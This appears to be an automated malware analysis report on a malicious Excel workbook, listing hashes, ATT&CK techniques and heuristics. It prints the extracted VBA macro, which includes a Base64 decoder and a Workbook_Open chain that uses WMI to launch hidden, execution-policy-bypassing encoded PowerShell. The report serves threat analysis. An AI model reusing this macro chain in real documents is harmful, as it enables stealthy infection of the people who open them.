Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 04cf805eac6a4f50…

MALICIOUS

Office (OOXML)

42.2 KB Created: 2021-06-22 12:43:05 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-05
MD5: dde7bcd65d93605ca35bc949a3485acd SHA-1: a8784a6a54c3ad53ff7a645f556ea0eae39dcfa5 SHA-256: 04cf805eac6a4f500866fb90a255b913e12e5b59d352e7960ea3cd3f117815a5
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1218.003 System Binary Proxy Execution: Windows Management Instrumentation T1059.003 Windows Command Shell

The sample is an Excel document containing a Workbook_Open VBA macro. This macro references cmd.exe and PowerShell, and uses WMI to launch processes. The VBA code appears to be obfuscated, but the heuristics indicate it's designed to execute a PowerShell command. This suggests the macro is intended to download and execute a second-stage payload.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 36591 bytes
SHA-256: 3bbf54bc5cfc723fb4f22148c5432bcc672415e9106dbf120ad338605bc8a4ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Const clOneMask = 16515072   
Private Const clTwoMask = 258048     
Private Const clThreeMask = 4032     
Private Const clFourMask = 63        
Private Const clHighMask = 16711680  
Private Const clMidMask = 65280      
Private Const clLowMask = 255        
Private Const cl2Exp18 = 262144      
Private Const cl2Exp12 = 4096        
Private Const cl2Exp6 = 64           
Private Const cl2Exp8 = 256          
Private Const cl2Exp16 = 65536       

Public Function Decode64(sString As String) As String                                                    
	Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long    
	Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String 
	Dim lTemp As Long                                                                                      
	sString = Replace(sString, vbCr, vbNullString)                                                         
	sString = Replace(sString, vbLf, vbNullString)                                                         
	lTemp = Len(sString) Mod 4                                                                             
	If lTemp Then                                                                                          
		Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")                   
	End If                                                                                                 
	If InStrRev(sString, "==") Then                                                                      
		iPad = 2                                                                                             
	ElseIf InStrRev(sString, "=") Then                                                                   
		iPad = 1                                                                                             
	End If                                                                                                 
	For lTemp = 0 To 255              
		Select Case lTemp
			Case 65 To 90
				bTrans(lTemp) = lTemp - 65 
			Case 97 To 122
				bTrans(lTemp) = lTemp - 71
			Case 48 To 57
				bTrans(lTemp) = lTemp + 4
			Case 43
				bTrans(lTemp) = 62
			Case 47
				bTrans(lTemp) = 63
		End Select
	Next lTemp
	For lTemp = 0 To 63
		lPowers6(lTemp) = lTemp * cl2Exp6
		lPowers12(lTemp) = lTemp * cl2Exp12
		lPowers18(lTemp) = lTemp * cl2Exp18
	Next lTemp
	bIn = StrConv(sString, vbFromUnicode) 
	ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
	For lChar = 0 To UBound(bIn) Step 4
		lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
				lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) 
		lTemp = lQuad And clHighMask
		bOut(lPos) = lTemp \ cl2Exp16
		lTemp = lQuad And clMidMask
		bOut(lPos + 1) = lTemp \ cl2Exp8
		bOut(lPos + 2) = lQuad And clLowMask
		lPos = lPos + 3
	Next lChar
	sOut = StrConv(bOut, vbUnicode)    
	If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
	Decode64 = sOut
End Function


Public Sub Pause(sngSecs As Single)
	Dim sngEnd As Single
	sngEnd = Timer + sngSecs
	While Timer < sngEnd
		DoEvents
	Wend
End Sub


Private Function VerifyPath()
	Dim fileStr As String
	VerifyPath = Decode64(NLT_Status_GWLBN())
End Function

Private Sub CovidMap()
	Pause (6)
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = 0
	Dim strstr As String
	strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(NLT_Status_GWLBN()), vbFromUnicode) + """"
	Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
	objProcess.Create strstr, Null, objConfig, intProcessID
End
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 11776 bytes
SHA-256: ac10a800cce5b5121e40b83cdb54be1d36daa31bd136b8540954c05b9fe16d03